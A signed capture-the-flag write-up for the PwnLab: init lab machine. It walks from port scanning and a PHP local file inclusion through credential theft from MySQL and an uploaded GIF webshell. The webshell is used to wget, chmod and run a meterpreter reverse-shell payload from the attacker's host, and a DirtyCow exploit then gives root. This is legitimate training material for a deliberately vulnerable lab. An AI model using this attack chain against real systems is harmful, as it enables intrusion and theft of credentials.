-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
# $Id: 2017_pwnlab.txt,v 1.0 2017/03/16 10:35:22 dhn Exp $
Writeup PwnLab: init [1]
0x0) found the ports
[dhn]::[~/dev/ctf/write_up/boot2root] export ip=174.0.42.3
[dhn]::[~/dev/ctf/write_up/boot2root] nmap -A -T4 -p- $ip
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-16 04:44 EDT
Nmap scan report for S0106c8fb267da995.cg.shawcable.net (174.0.42.3)
Host is up (0.00021s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 42451/udp status
|_ 100024 1 54275/tcp status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
|_mysql-info: ERROR: Script execution failed (use -d to debug)
54275/tcp open status 1 (RPC #100024)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.07 seconds
0x1) use gobuster to found some interested folder/files
[dhn]::[~/dev/ctf/write_up/boot2root] gobuster -w /usr/share/wordlists/dirb/common.txt -u http://$ip
Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://174.0.42.3/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 301,302,307,200,204
=====================================================
/images (Status: 301)
/index.php (Status: 200)
/upload (Status: 301)
=====================================================
0x2) open firefox and go to https://$ip
0x3) use the LFI in combination with an php wrapper [2]
[dhn]::[~/dev/ctf/write_up/boot2root] curl -s http://$ip/?page=php://filter/convert.base64-encode/resource=index | grep -e '[^\ ]\{40,\}' | base64 -d
PwnLab Intranet Image Hosting
[ Home ] [ Login ] [ Upload ]
[dhn]::[~/dev/ctf/write_up/boot2root] curl -s http://$ip/?page=php://filter/convert.base64-encode/resource=upload | grep -e '[^\ ]\{40,\}' | base64 -d
1){
die('Error 003');
}
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "
";
} else {
die('Error 4');
}
}
}
?>
[dhn]::[~/dev/ctf/write_up/boot2root] curl -s http://$ip/?page=php://filter/convert.base64-encode/resource=login | grep -e '[^\ ]\{40,\}' | base64 -d
prepare("SELECT * FROM users WHERE user=? AND pass=?");
$stmt->bind_param('ss', $luser, $lpass);
$stmt->execute();
$stmt->store_Result();
if ($stmt->num_rows == 1)
{
$_SESSION['user'] = $luser;
header('Location: ?page=upload');
}
else
{
echo "Login failed.";
}
}
else
{
?>
0x4) take the leaked password and connect to the mysql server
[dhn]::[~/dev/ctf/write_up/boot2root] mysql -u root -p -h $ip
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 80
Server version: 5.5.47-0+deb8u1 (Debian)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
0x5) grab password "hashes"
mysql> use "Users"
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)
mysql> select * from users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.01 sec)
mysql> exit
Bye
# decode base64 strings
kent:JWzXuBJJNy
mike:SIfdsTEn6I
kane:iSv5Ym2GRo
0x6) use the credentials to login into the page and upload an webshell.
the upload.php script allows only ".jpg",".jpeg",".gif",".png" files.
[dhn]::[~/dev/ctf/write_up/boot2root] cat evil.gif
GIF89a1
0x7) we can trigger the payload in the uploaded *.gif by using the "lang"
cookie flag in the index.php:
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
[dhn]::[~/dev/ctf/write_up/boot2root] curl -s --data "cmd=id" http://$ip/ -b "lang=../upload/1b7d2e8797d863fdf63594e390c18255.gif" | head -n3
GIF89a1
uid=33(www-data) gid=33(www-data) groups=33(www-data)
0x8) create meterpreter and start multi handler
[dhn]::[~/dev/ctf/write_up/boot2root] msfvenom -p linux/x86/meterpreter/reverse_tcp -a x86 --platform linux -b '\\x00' LHOST="10.9.0.2" LPORT=7766 -f elf -o evil_dhn
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 98 (iteration=0)
x86/shikata_ga_nai chosen with final size 98
Payload size: 98 bytes
Final size of elf file: 182 bytes
Saved as: evil_dhn
0x9) use the webshell to download and execute the meterpreter
[dhn]::[~/dev/ctf/write_up/boot2root] curl -s --data "cmd=wget http://10.9.0.2:8000/dhn -O /tmp/evil" http://$ip/ -b "lang=../upload/1b7d2e8797d863fdf63594e390c18255.gif" | head -n3
[dhn]::[~/dev/ctf/write_up/boot2root] curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/ -b "lang=../upload/1b7d2e8797d863fdf63594e390c18255.gif" | head -n3
[dhn]::[~/dev/ctf/write_up/boot2root] curl -s --data "cmd=bash -c /tmp/evil" http://$ip/ -b "lang=../upload/1b7d2e8797d863fdf63594e390c18255.gif" | head -n3
0xa) gathering information
msf exploit(handler) > run
[*] Started reverse TCP handler on 10.9.0.2:7766
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 174.0.42.3
[*] Meterpreter session 1 opened (10.9.0.2:7766 -> 174.0.42.3:40256) at 2017-02-07 13:04:30 +0100
meterpreter > sysinfo
Computer : pwnlab
OS : Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686
Meterpreter : php/linux
meterpreter > shell
Process 17286 created.
Channel 0 created.
/bin/sh -i
/bin/sh: 0: can't access tty; job control turned off
$ w
07:08:37 up 1 day, 3:19, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
0xb) privilege escalation - dirtycow
$ gcc cow32.c -o cowroot -pthread 2>/dev/null
$ ./cowroot
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 53112
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
root@pwnlab:/tmp#
0xc) captcha the flag
root@pwnlab:/tmp# cd /root/
root@pwnlab:/root# ls
flag.txt messages.txt
root@pwnlab:/root# cat flag.txt
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ \ | | (__ _)
( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ \| '_ \ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___)
(__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs.com (__ _)
( _ __) claor@PwnLab.net - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'
root@pwnlab:/root#
[1] https://www.vulnhub.com/entry/pwnlab-init,158/
[2] http://www.php.net/manual/en/wrappers.php.php
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCgAGBQJYylxwAAoJEKjdmUcmQRI8u6MP/3Ii2YjsjGliHKM4GIeKo90J
u5JMXkJNATJqfVKwTClr6lzlrHTtzmFoUVNstp9oMzPo76O56d25hPpzgXbPTg4A
tpYpwWPnGiTKCc8pkxv05cA861lbBMr3xb5aZW/7bdbJ/425JvCwD88RGkgWnqdu
+puTyleIXYLQx/4DUJWl04G1WoWgd0GB9Y4K514iHVeqUd/kLi3ro5Pkl9MVs5rJ
jZ/2hYClESiYqw21fLxmpQV6zAsTYZR5Racbb8e2t5YKVioMvi2p7/n2o8oy+BZx
YJYCWrIjcbc1iL1/aHkvsK0Do3lUgZ3h7+wj8CbJWwdZftshYBU/Vx65FNzbcTsk
yKtoBOl3BVwatYdIZQGg/K22BdKTUlOTpyss7cBHqVssQuezXNIh1JxbipKH/KxO
rUUkknXQak5tu4OWknA6UQQDddanAwG39ApMHuAH4+MPFN3MqFOjB0DWJU0of2dU
T4aQ3X54nX4IkCpQWV7jUPhyt4SDkz8lWdeCbeRWPqPT4yBLtKHhS6Mvz9QdPVY4
UIdr0HMO/DXnoQLPSfb0gIQGtpWBSstvX4jeXWDOTbqku/k0f0EtmMMOLF2l7H70
TJxyK8lciPo0OkcH3Kmhibn9+xygUwgIMVVKzh06MgMRZdX3aeP0VoA4Pay3HkMO
KiAjXv+8eyLmqGteLxiJ
=MGM1
-----END PGP SIGNATURE-----